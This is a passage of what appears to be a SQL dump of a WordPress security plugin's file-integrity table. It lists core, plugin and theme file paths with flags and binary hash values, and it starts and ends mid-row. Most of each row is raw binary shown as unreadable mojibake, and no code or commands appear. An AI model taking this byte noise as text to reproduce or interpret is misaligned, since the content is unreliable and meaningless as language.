�2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('uK˒2(_u��B\r���','wp-includes/wp-includes/js/jquery/jquery-migrate.js',0,'�\0�6��?ٳ��t�\r','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('ue�,\"\n	�h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&��΁�����������s-�','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��:o;J��\n���b','[d�%>��[�l�����[�,0o_IX>ڦ2�','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�@@�� �����N6','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',0,'�E��ƀk�vk��\r','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE)�-0�M�;���h','2ꦢ�3l\'k��c�{�=ߺ��$[��&Of��','',0,'?'),('v��]��R���ҒG�','wp-content/themes/sg-window/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I���x\'�WIվ��','mU�\r���z����JFK�Ӓ��A�','',0,'?'),('v1��3_���_���0�','wp-content/themes/shootingstar/js/infinitescroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�{�`�3¯�h�$K','��əc1-��:7.9�g�����1\Z��','',0,'?'),('vK;@�s�aU1;�	^�','wp-config.php',0,'pǒp�2����%e�\\','pǒp�2����%e�\\','v�l��a����Zs���l�C��HtJt����','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('vY���a�?��\\h�} 7','wp-includes/wp-includes/ID3/getid3.lib.php',0,'CPb$M6̟��ҁ�','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('ve׶\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u��	','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v~��c��hTxI�����','wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js',0,'���s�/�q��','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�L\0�4Wd�n�tG��','X\\�m��ؓ�>^\'�_4У��4ԗ����uV0','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v���DQ�~�1��X[3','wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js',0,'t��|�eɤs^�Q�','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v�@<w�m&���6�','wp-includes/wp-includes/css/dashicons.min.css',0,'֍k����U�о�3�','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������8��B#','���{)�\"�;?�ϙXGDI�RD?K@^X���P','',0,'?'),('v�����rԋ��a�','wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js',0,'B7�I1�0�����d�','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��l� ճ=���}�','����40Y0ĽH��8���{V�7(@��0','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('w!� -!{0�\'�\\�Z','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',0,'t�r�I���bw\'-7�','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y	ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('wz�W�%*��5R;r','wp-includes/wp-includes/js/media-editor.min.js',0,'Sq��a:�_::ΗF�.','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�^�d��g�Agbm','wp-includes/wp-includes/class-wp-post-type.php',0,'1$�%�:��I�:��','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('w��`F7�\r���ɹd6','wp-content/themes/sg-window/inc/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�fD�l�����MV0e','�I�l�yTK�a#W�m3�zY/�	�B�YX]_�ҁ','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w�\0qI��qgI��xz�','wp-includes/wp-includes/Requests/Exception/HTTP/401.php',0,';*������?�d��@',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('w��#&��}H	��)�','wp-content/themes/sg-window/inc/css/sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������E�3ʼrs�','J�������I#\\�J�9�Unes�-�\\�','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�Wi,>�z�','4��3ײ>b/?�Rx��ʚ?;��Z��7�R�','',0,'?'),('x	G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eV‹T`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xP�ފTX�����?','wp-includes/wp-includes/theme-compat/header.php',0,'�s��<w�!��1','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('xV�Z���]�B�B�ya','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php',0,'�&a���1��5b}1','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9',';	�_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�qly��(��:�V�5','wp-includes/wp-includes/class-wp-xmlrpc-server.php',0,'1�.d��\rZ�D�6','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('x�C���\"h&_�\0ۣ��','wp-includes/wp-includes/class-wp-http-requests-response.php',0,'�O�TP^��rbb!d�','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҹ�h�4q�paT0��','̡��pr\n��Y���aZ|�i�S��,��/��','',0,'?'),('x��9��\0��$q�','wp-content/themes/shootingstar/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�W����/���K','�bƥv�������`%�=OÇ7J�K�:��','',0,'?'),('x������yu�H;�','wp-includes/wp-includes/js/dist/block-editor.min.js',0,'����l�(�� \r$','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�y׺ڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'r�\Zv�Fn˕��','�nZ��c�p1�%#�1X?�Z��W=��xy�\r[�','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yC��\\9G^�h�','wp-includes/wp-includes/post-template.php',0,'a^E�@�p�\'��?�','a^E�@�p�\'��?�','N�O�[wȐ��	��&Ќ�!P��Qe��s','',0,'?'),('yF�=3 R~�4��ej*�','wp-content/themes/sg-window/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�a$�W�����[e','�g?t���j���恇bw�\"�&�и���','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('ye�*�B��[����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php',0,'\rV�N�ck0�}/�Ճ�','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y�8�Fr^�̅Gg','wp-content/themes/sg-window/page-templates/two-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���!ɚe�^F','�F�Я��\Z�+��n��a�3���ڜV\\��','',0,'?'),('y��9 1v.`F2��','wp-includes/wp-includes/js/swfobject.js',0,'���,�I}p�e~2�q�','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4��	fk>�χO��}','',0,'?'),('y��l`����c�ˊ٣','wp-includes/wp-includes/Requests/Exception/HTTP/428.php',0,'���i�B��}�^�t*','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�s7S`�G���UI�','�i�\"ă�;]���HY��;z�,n����P^Z[\'J�','',0,'?'),('y�o���⳸����: ','wp-content/themes/shootingstar/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�T�?�<>3 ����','�t�6�$�t�8����}Yz���B�-H','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�c$Koʛd\\\ni�7�','���h�\"��y��K\'� <�v�mZ9Qg�','',0,'?'),('y�\\���.J.�=�ou','wp-includes/wp-includes/template.php',0,'^��f?Yk�EЉ��+V','^��f?Yk�EЉ��+V','a�+)	�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ss#V����͓h�C�','XDx�ޭ7豽Hs�E��k]����\Z���i\'��','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z1o*�{��� �z','wp-includes/wp-includes/css/dist/block-library/common.css',0,'QD�����B+|lH��','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��mi䙶�&�','�����U�?6RA鲣�����R�)b�n8�','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('z`�6P\'&%�\\�f��','wp-includes/wp-includes/Text/Diff/Engine/string.php',0,':��=�M��\0��i)',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q>�<�H[AYܝ\n���','��{p2�J�+-��%�.�G#�rpE�]>���','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z���(o�@� �1�\n','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php',0,'�EOxٕX�2떭؃','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5	g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���l&��\0G�c',',��	�ۗ*u�K\\����A����������wD�','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z���?����$�*��7','wp-content/themes/shootingstar/functions/about/images/premium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#����	��>l�z��','F�\\q]hͽ���O�d����_$%#x�14','',0,'?'),('z΋ۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('z�WEz�.����J�j�','wp-admin/object-cache.php',0,'��d0��ϸ����Fm>^','��d0��ϸ����Fm>^','����<�6U�-r�á���?��e\'�	XG��','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��P�N��P�','H+T9���h�m�)L���(��u�Z^dH�','',0,'?'),('{�\r�Yg���C�Kg','wp-includes/wp-includes/post-formats.php',0,'�h�%�J|,%Fś@','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('{N���2�Q�u��=	�','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{3�\"�K$��3���έ','wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php',0,'�H���q�g��l�t','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h�	o�\\`��Y��','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���X�\'��]2�!','����~�X\0I��8�w,��NÃ�}v7��C','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P9�6�Z3\'2���>','�v�t&�����h3�C���9)�L��9Ub�Ki','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{�j�ɏ|n�	^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{�@�\Z�3i�[Ȁ�>','wp-includes/wp-includes/class-wp-customize-manager.php',0,'-@�{�p\r���9�u','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('{޴uo���\r	/dM}','wp-content/themes/sg-window/inc/js/portfolio-nav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ެd-H�jMY��e3','�ښ����\0��ɺU*�4=����qH	����=�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z2�j��(=iSM�IV�','\Z�/������\'\\��.��	7�����3','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����~FՕ��','H,=�!B�=�?��Op`K˄�`�^�y!���','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|\\~S���Oj���/�t','wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php',0,'X��U iU0�ll9�c','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('|a�i)ݣ�}��3�','wp-includes/wp-includes/class-wp-site-query.php',0,'*Wy�\ng�MP��)�p1','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@�	��Π@','',0,'?'),('|g��$ h�xְc��y','wp-content/themes/shootingstar/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c]�;�F�ҕ�|>v7�A',']� �|LMG�}F��í�$U��cww�P3S_�>=','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o���	���tV�','',0,'?'),('|��\\w�4�ѸQj���','wp-includes/wp-includes/images/crystal/video.png',0,'���l��ڤ�;�=','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0`	Vz��Kd�����^,h�','',0,'?'),('|���͉5l����$��]','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js',0,'�B�\n�4�\\��0�=','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Gy�d�7?��_�','�3�7!��|�����%�e��k�6XL','',0,'?'),('|��,��Q����w�[','wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js',0,'���*Bz��L��','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('|��Y�>��	�Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�!\'ljP��^kI��','�5:���q��φR_\\y���h�\rLIl���','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('})��V�7�]wc���','wp-includes/wp-includes/js/wp-custom-header.js',0,'+,�!�ڊLӺ~ν7�','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('}.�s�ؠ<B ��s','wp-includes/wp-includes/SimplePie/Exception.php',0,'逗z�qŔ��/��','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�